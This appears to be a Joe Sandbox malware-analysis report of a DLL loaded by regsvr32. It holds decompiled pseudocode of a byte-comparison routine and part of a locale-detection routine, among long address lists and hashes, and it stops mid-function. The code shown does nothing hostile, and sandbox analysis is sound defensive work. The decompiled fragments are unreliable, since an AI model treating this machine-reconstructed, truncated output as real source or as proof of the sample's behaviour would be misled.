                                                                                                        0x00000000
                                                                                                        0x10018ad5
                                                                                                        0x10018aa9
                                                                                                        0x10018aac
                                                                                                        0x10018ab0
                                                                                                        0x10018ab4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018ab4
                                                                                                        0x10018a88
                                                                                                        0x10018a8b
                                                                                                        0x10018a8f
                                                                                                        0x10018a93
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018a93
                                                                                                        0x10018696
                                                                                                        0x10018696
                                                                                                        0x00000000

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                        • Instruction ID: cc46d25ea22f0c970390981d75405525d0e25b6b0a86731603265a14af2b5516
                                                                                                        • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                        • Instruction Fuzzy Hash: 2EC14F73C0AAF30A8375C12D455812AEFE2AFC169531BC7E1DCD43F28992369F8596D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1001869D(void* __eax, void* __ecx) {
                                                                                                        				void* _t177;
                                                                                                        				signed int _t178;
                                                                                                        				void* _t181;
                                                                                                        				signed char _t187;
                                                                                                        				signed char _t188;
                                                                                                        				signed char _t189;
                                                                                                        				signed char _t191;
                                                                                                        				signed char _t192;
                                                                                                        				signed int _t198;
                                                                                                        				signed int _t284;
                                                                                                        				void* _t287;
                                                                                                        				void* _t289;
                                                                                                        				void* _t291;
                                                                                                        				void* _t293;
                                                                                                        				void* _t295;
                                                                                                        				void* _t297;
                                                                                                        				void* _t300;
                                                                                                        				void* _t302;
                                                                                                        				void* _t304;
                                                                                                        				void* _t307;
                                                                                                        				void* _t309;
                                                                                                        				void* _t311;
                                                                                                        				void* _t314;
                                                                                                        				void* _t316;
                                                                                                        				void* _t318;
                                                                                                        				void* _t321;
                                                                                                        				void* _t323;
                                                                                                        				void* _t325;
                                                                                                        
                                                                                                        				_t181 = __ecx;
                                                                                                        				_t177 = __eax;
                                                                                                        				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
                                                                                                        					_t284 = 0;
                                                                                                        					L11:
                                                                                                        					if(_t284 != 0) {
                                                                                                        						goto L1;
                                                                                                        					}
                                                                                                        					_t187 =  *(_t177 - 0x18);
                                                                                                        					if(_t187 ==  *(_t181 - 0x18)) {
                                                                                                        						_t284 = 0;
                                                                                                        						L22:
                                                                                                        						if(_t284 != 0) {
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        						_t188 =  *(_t177 - 0x14);
                                                                                                        						if(_t188 ==  *(_t181 - 0x14)) {
                                                                                                        							_t284 = 0;
                                                                                                        							L33:
                                                                                                        							if(_t284 != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							_t189 =  *(_t177 - 0x10);
                                                                                                        							if(_t189 ==  *(_t181 - 0x10)) {
                                                                                                        								_t284 = 0;
                                                                                                        								L44:
                                                                                                        								if(_t284 != 0) {
                                                                                                        									goto L1;
                                                                                                        								}
                                                                                                        								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
                                                                                                        									_t284 = 0;
                                                                                                        									L55:
                                                                                                        									if(_t284 != 0) {
                                                                                                        										goto L1;
                                                                                                        									}
                                                                                                        									_t191 =  *(_t177 - 8);
                                                                                                        									if(_t191 ==  *(_t181 - 8)) {
                                                                                                        										_t284 = 0;
                                                                                                        										L66:
                                                                                                        										if(_t284 != 0) {
                                                                                                        											goto L1;
                                                                                                        										}
                                                                                                        										_t192 =  *(_t177 - 4);
                                                                                                        										if(_t192 ==  *(_t181 - 4)) {
                                                                                                        											_t178 = 0;
                                                                                                        											L78:
                                                                                                        											if(_t178 == 0) {
                                                                                                        												_t178 = 0;
                                                                                                        											}
                                                                                                        											L80:
                                                                                                        											return _t178;
                                                                                                        										}
                                                                                                        										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
                                                                                                        										if(_t287 == 0) {
                                                                                                        											L70:
                                                                                                        											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
                                                                                                        											if(_t289 == 0) {
                                                                                                        												L72:
                                                                                                        												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
                                                                                                        												if(_t291 == 0) {
                                                                                                        													L75:
                                                                                                        													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
                                                                                                        													if(_t178 != 0) {
                                                                                                        														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
                                                                                                        													}
                                                                                                        													goto L78;
                                                                                                        												}
                                                                                                        												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
                                                                                                        												if(_t198 == 0) {
                                                                                                        													goto L75;
                                                                                                        												}
                                                                                                        												L74:
                                                                                                        												_t178 = _t198;
                                                                                                        												goto L78;
                                                                                                        											}
                                                                                                        											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
                                                                                                        											if(_t198 != 0) {
                                                                                                        												goto L74;
                                                                                                        											}
                                                                                                        											goto L72;
                                                                                                        										}
                                                                                                        										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
                                                                                                        										if(_t198 != 0) {
                                                                                                        											goto L74;
                                                                                                        										}
                                                                                                        										goto L70;
                                                                                                        									}
                                                                                                        									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
                                                                                                        									if(_t293 == 0) {
                                                                                                        										L59:
                                                                                                        										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
                                                                                                        										if(_t295 == 0) {
                                                                                                        											L61:
                                                                                                        											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
                                                                                                        											if(_t297 == 0) {
                                                                                                        												L63:
                                                                                                        												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
                                                                                                        												if(_t284 != 0) {
                                                                                                        													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                        												}
                                                                                                        												goto L66;
                                                                                                        											}
                                                                                                        											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
                                                                                                        											if(_t284 != 0) {
                                                                                                        												goto L1;
                                                                                                        											}
                                                                                                        											goto L63;
                                                                                                        										}
                                                                                                        										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
                                                                                                        										if(_t284 != 0) {
                                                                                                        											goto L1;
                                                                                                        										}
                                                                                                        										goto L61;
                                                                                                        									}
                                                                                                        									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
                                                                                                        									if(_t284 != 0) {
                                                                                                        										goto L1;
                                                                                                        									}
                                                                                                        									goto L59;
                                                                                                        								}
                                                                                                        								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
                                                                                                        								if(_t300 == 0) {
                                                                                                        									L48:
                                                                                                        									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
                                                                                                        									if(_t302 == 0) {
                                                                                                        										L50:
                                                                                                        										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
                                                                                                        										if(_t304 == 0) {
                                                                                                        											L52:
                                                                                                        											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
                                                                                                        											if(_t284 != 0) {
                                                                                                        												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                        											}
                                                                                                        											goto L55;
                                                                                                        										}
                                                                                                        										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
                                                                                                        										if(_t284 != 0) {
                                                                                                        											goto L1;
                                                                                                        										}
                                                                                                        										goto L52;
                                                                                                        									}
                                                                                                        									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
                                                                                                        									if(_t284 != 0) {
                                                                                                        										goto L1;
                                                                                                        									}
                                                                                                        									goto L50;
                                                                                                        								}
                                                                                                        								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
                                                                                                        								if(_t284 != 0) {
                                                                                                        									goto L1;
                                                                                                        								}
                                                                                                        								goto L48;
                                                                                                        							}
                                                                                                        							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
                                                                                                        							if(_t307 == 0) {
                                                                                                        								L37:
                                                                                                        								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
                                                                                                        								if(_t309 == 0) {
                                                                                                        									L39:
                                                                                                        									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
                                                                                                        									if(_t311 == 0) {
                                                                                                        										L41:
                                                                                                        										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
                                                                                                        										if(_t284 != 0) {
                                                                                                        											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                        										}
                                                                                                        										goto L44;
                                                                                                        									}
                                                                                                        									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
                                                                                                        									if(_t284 != 0) {
                                                                                                        										goto L1;
                                                                                                        									}
                                                                                                        									goto L41;
                                                                                                        								}
                                                                                                        								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                        								if(_t284 != 0) {
                                                                                                        									goto L1;
                                                                                                        								}
                                                                                                        								goto L39;
                                                                                                        							}
                                                                                                        							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
                                                                                                        							if(_t284 != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							goto L37;
                                                                                                        						}
                                                                                                        						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
                                                                                                        						if(_t314 == 0) {
                                                                                                        							L26:
                                                                                                        							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
                                                                                                        							if(_t316 == 0) {
                                                                                                        								L28:
                                                                                                        								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
                                                                                                        								if(_t318 == 0) {
                                                                                                        									L30:
                                                                                                        									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
                                                                                                        									if(_t284 != 0) {
                                                                                                        										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                        									}
                                                                                                        									goto L33;
                                                                                                        								}
                                                                                                        								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                                                                                                        								if(_t284 != 0) {
                                                                                                        									goto L1;
                                                                                                        								}
                                                                                                        								goto L30;
                                                                                                        							}
                                                                                                        							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                        							if(_t284 != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							goto L28;
                                                                                                        						}
                                                                                                        						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                                                                                                        						if(_t284 != 0) {
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        						goto L26;
                                                                                                        					}
                                                                                                        					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
                                                                                                        					if(_t321 == 0) {
                                                                                                        						L15:
                                                                                                        						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
                                                                                                        						if(_t323 == 0) {
                                                                                                        							L17:
                                                                                                        							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
                                                                                                        							if(_t325 == 0) {
                                                                                                        								L19:
                                                                                                        								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
                                                                                                        								if(_t284 != 0) {
                                                                                                        									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                                        								}
                                                                                                        								goto L22;
                                                                                                        							}
                                                                                                        							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                                                                                                        							if(_t284 != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							goto L19;
                                                                                                        						}
                                                                                                        						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                                                                                                        						if(_t284 != 0) {
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        						goto L17;
                                                                                                        					}
                                                                                                        					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                                                                                                        					if(_t284 != 0) {
                                                                                                        						goto L1;
                                                                                                        					}
                                                                                                        					goto L15;
                                                                                                        				} else {
                                                                                                        					__esi = __dl & 0x000000ff;
                                                                                                        					__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                        					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                        					if(__esi == 0) {
                                                                                                        						L4:
                                                                                                        						__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                                        						__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                        						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                        						if(__esi == 0) {
                                                                                                        							L6:
                                                                                                        							__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                                        							__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                                        							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                                        							if(__esi == 0) {
                                                                                                        								L8:
                                                                                                        								__esi =  *(__eax - 0x19) & 0x000000ff;
                                                                                                        								__edx =  *(__ecx - 0x19) & 0x000000ff;
                                                                                                        								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                                                                                                        								if(__esi != 0) {
                                                                                                        									0 = 0 | __esi > 0x00000000;
                                                                                                        									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        								}
                                                                                                        								goto L11;
                                                                                                        							}
                                                                                                        							0 = 0 | __esi > 0x00000000;
                                                                                                        							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        							__esi = __edx;
                                                                                                        							if(__edx != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							goto L8;
                                                                                                        						}
                                                                                                        						0 = 0 | __esi > 0x00000000;
                                                                                                        						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        						__esi = __edx;
                                                                                                        						if(__edx != 0) {
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        						goto L6;
                                                                                                        					}
                                                                                                        					0 = 0 | __esi > 0x00000000;
                                                                                                        					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        					__esi = __edx;
                                                                                                        					if(__edx != 0) {
                                                                                                        						goto L1;
                                                                                                        					}
                                                                                                        					goto L4;
                                                                                                        				}
                                                                                                        				L1:
                                                                                                        				_t178 = _t284;
                                                                                                        				goto L80;
                                                                                                        			}































                                                                                                        0x1001869d
                                                                                                        0x1001869d
                                                                                                        0x100186a3
                                                                                                        0x10018716
                                                                                                        0x10018718
                                                                                                        0x1001871a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018720
                                                                                                        0x10018726
                                                                                                        0x100187a5
                                                                                                        0x100187a7
                                                                                                        0x100187a9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100187af
                                                                                                        0x100187b5
                                                                                                        0x10018834
                                                                                                        0x10018836
                                                                                                        0x10018838
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001883e
                                                                                                        0x10018844
                                                                                                        0x100188c3
                                                                                                        0x100188c5
                                                                                                        0x100188c7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100188d3
                                                                                                        0x10018953
                                                                                                        0x10018955
                                                                                                        0x10018957
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001895d
                                                                                                        0x10018963
                                                                                                        0x100189e2
                                                                                                        0x100189e4
                                                                                                        0x100189e6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100189ec
                                                                                                        0x100189f2
                                                                                                        0x10018a63
                                                                                                        0x10018a65
                                                                                                        0x10018a67
                                                                                                        0x10018a69
                                                                                                        0x10018a69
                                                                                                        0x10018a6b
                                                                                                        0x100197c7
                                                                                                        0x100197c7
                                                                                                        0x100189fb
                                                                                                        0x100189fd
                                                                                                        0x10018a0e
                                                                                                        0x10018a16
                                                                                                        0x10018a18
                                                                                                        0x10018a29
                                                                                                        0x10018a31
                                                                                                        0x10018a33
                                                                                                        0x10018a48
                                                                                                        0x10018a50
                                                                                                        0x10018a52
                                                                                                        0x10018a5f
                                                                                                        0x10018a5f
                                                                                                        0x00000000
                                                                                                        0x10018a52
                                                                                                        0x10018a3c
                                                                                                        0x10018a42
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018a44
                                                                                                        0x10018a44
                                                                                                        0x00000000
                                                                                                        0x10018a44
                                                                                                        0x10018a21
                                                                                                        0x10018a27
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018a27
                                                                                                        0x10018a06
                                                                                                        0x10018a0c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018a0c
                                                                                                        0x1001896c
                                                                                                        0x1001896e
                                                                                                        0x10018985
                                                                                                        0x1001898d
                                                                                                        0x1001898f
                                                                                                        0x100189a6
                                                                                                        0x100189ae
                                                                                                        0x100189b0
                                                                                                        0x100189c7
                                                                                                        0x100189cf
                                                                                                        0x100189d1
                                                                                                        0x100189de
                                                                                                        0x100189de
                                                                                                        0x00000000
                                                                                                        0x100189d1
                                                                                                        0x100189bd
                                                                                                        0x100189c1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100189c1
                                                                                                        0x1001899c
                                                                                                        0x100189a0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100189a0
                                                                                                        0x1001897b
                                                                                                        0x1001897f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001897f
                                                                                                        0x100188dd
                                                                                                        0x100188df
                                                                                                        0x100188f6
                                                                                                        0x100188fe
                                                                                                        0x10018900
                                                                                                        0x10018917
                                                                                                        0x1001891f
                                                                                                        0x10018921
                                                                                                        0x10018938
                                                                                                        0x10018940
                                                                                                        0x10018942
                                                                                                        0x1001894f
                                                                                                        0x1001894f
                                                                                                        0x00000000
                                                                                                        0x10018942
                                                                                                        0x1001892e
                                                                                                        0x10018932
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018932
                                                                                                        0x1001890d
                                                                                                        0x10018911
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018911
                                                                                                        0x100188ec
                                                                                                        0x100188f0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100188f0
                                                                                                        0x1001884d
                                                                                                        0x1001884f
                                                                                                        0x10018866
                                                                                                        0x1001886e
                                                                                                        0x10018870
                                                                                                        0x10018887
                                                                                                        0x1001888f
                                                                                                        0x10018891
                                                                                                        0x100188a8
                                                                                                        0x100188b0
                                                                                                        0x100188b2
                                                                                                        0x100188bf
                                                                                                        0x100188bf
                                                                                                        0x00000000
                                                                                                        0x100188b2
                                                                                                        0x1001889e
                                                                                                        0x100188a2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100188a2
                                                                                                        0x1001887d
                                                                                                        0x10018881
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018881
                                                                                                        0x1001885c
                                                                                                        0x10018860
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018860
                                                                                                        0x100187be
                                                                                                        0x100187c0
                                                                                                        0x100187d7
                                                                                                        0x100187df
                                                                                                        0x100187e1
                                                                                                        0x100187f8
                                                                                                        0x10018800
                                                                                                        0x10018802
                                                                                                        0x10018819
                                                                                                        0x10018821
                                                                                                        0x10018823
                                                                                                        0x10018830
                                                                                                        0x10018830
                                                                                                        0x00000000
                                                                                                        0x10018823
                                                                                                        0x1001880f
                                                                                                        0x10018813
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018813
                                                                                                        0x100187ee
                                                                                                        0x100187f2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100187f2
                                                                                                        0x100187cd
                                                                                                        0x100187d1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100187d1
                                                                                                        0x1001872f
                                                                                                        0x10018731
                                                                                                        0x10018748
                                                                                                        0x10018750
                                                                                                        0x10018752
                                                                                                        0x10018769
                                                                                                        0x10018771
                                                                                                        0x10018773
                                                                                                        0x1001878a
                                                                                                        0x10018792
                                                                                                        0x10018794
                                                                                                        0x100187a1
                                                                                                        0x100187a1
                                                                                                        0x00000000
                                                                                                        0x10018794
                                                                                                        0x10018780
                                                                                                        0x10018784
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018784
                                                                                                        0x1001875f
                                                                                                        0x10018763
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018763
                                                                                                        0x1001873e
                                                                                                        0x10018742
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100186a5
                                                                                                        0x100186a5
                                                                                                        0x100186a8
                                                                                                        0x100186ac
                                                                                                        0x100186ae
                                                                                                        0x100186c1
                                                                                                        0x100186c1
                                                                                                        0x100186c5
                                                                                                        0x100186c9
                                                                                                        0x100186cb
                                                                                                        0x100186de
                                                                                                        0x100186de
                                                                                                        0x100186e2
                                                                                                        0x100186e6
                                                                                                        0x100186e8
                                                                                                        0x100186fb
                                                                                                        0x100186fb
                                                                                                        0x100186ff
                                                                                                        0x10018703
                                                                                                        0x10018705
                                                                                                        0x1001870b
                                                                                                        0x1001870e
                                                                                                        0x10018712
                                                                                                        0x10018712
                                                                                                        0x00000000
                                                                                                        0x10018705
                                                                                                        0x100186ee
                                                                                                        0x100186f1
                                                                                                        0x100186f5
                                                                                                        0x100186f9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100186f9
                                                                                                        0x100186d1
                                                                                                        0x100186d4
                                                                                                        0x100186d8
                                                                                                        0x100186dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100186dc
                                                                                                        0x100186b4
                                                                                                        0x100186b7
                                                                                                        0x100186bb
                                                                                                        0x100186bf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100186bf
                                                                                                        0x10018696
                                                                                                        0x10018696
                                                                                                        0x00000000

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                        • Instruction ID: dcda9d5c94f77def7d8943a89e96ba339e92ee3075ebe02bffe06bb3663a938a
                                                                                                        • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                        • Instruction Fuzzy Hash: 2AC14D73D0AAF30A8365C12D455812AEAE2AFC158432FC7A1DCD43F289D636DF8597D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 84%
                                                                                                        			E1000AA3A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t73;
                                                                                                        				struct HINSTANCE__* _t78;
                                                                                                        				_Unknown_base(*)()* _t79;
                                                                                                        				struct HINSTANCE__* _t81;
                                                                                                        				signed int _t92;
                                                                                                        				signed int _t94;
                                                                                                        				unsigned int _t97;
                                                                                                        				void* _t113;
                                                                                                        				unsigned int _t115;
                                                                                                        				signed short _t123;
                                                                                                        				unsigned int _t124;
                                                                                                        				_Unknown_base(*)()* _t131;
                                                                                                        				signed short _t133;
                                                                                                        				unsigned int _t134;
                                                                                                        				intOrPtr _t143;
                                                                                                        				void* _t144;
                                                                                                        				int _t145;
                                                                                                        				int _t146;
                                                                                                        				signed int _t164;
                                                                                                        				void* _t167;
                                                                                                        				signed int _t169;
                                                                                                        				void* _t170;
                                                                                                        				int _t172;
                                                                                                        				signed int _t176;
                                                                                                        				void* _t177;
                                                                                                        				CHAR* _t181;
                                                                                                        				void* _t183;
                                                                                                        				void* _t184;
                                                                                                        
                                                                                                        				_t167 = __edx;
                                                                                                        				_t184 = _t183 - 0x118;
                                                                                                        				_t181 = _t184 - 4;
                                                                                                        				_t73 =  *0x10057a08; // 0xe6b5ff6d
                                                                                                        				_t181[0x118] = _t73 ^ _t181;
                                                                                                        				_push(0x58);
                                                                                                        				E10017BC1(E10027E56, __ebx, __edi, __esi);
                                                                                                        				_t169 = 0;
                                                                                                        				 *(_t181 - 0x40) = _t181[0x124];
                                                                                                        				 *(_t181 - 0x14) = 0;
                                                                                                        				 *(_t181 - 0x10) = 0;
                                                                                                        				_t78 = GetModuleHandleA("kernel32.dll");
                                                                                                        				 *(_t181 - 0x18) = _t78;
                                                                                                        				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
                                                                                                        				if(_t79 == 0) {
                                                                                                        					if(GetVersion() >= 0) {
                                                                                                        						_t81 = GetModuleHandleA("ntdll.dll");
                                                                                                        						if(_t81 != 0) {
                                                                                                        							 *(_t181 - 0x14) = 0;
                                                                                                        							EnumResourceLanguagesA(_t81, 0x10, 1, E1000A1E3, _t181 - 0x14);
                                                                                                        							if( *(_t181 - 0x14) != 0) {
                                                                                                        								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
                                                                                                        								_t145 = _t97 & 0x3ff;
                                                                                                        								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
                                                                                                        								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
                                                                                                        								 *(_t181 - 0x10) = 2;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						 *(_t181 - 0x18) = 0;
                                                                                                        						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
                                                                                                        							 *(_t181 - 0x44) = 0x10;
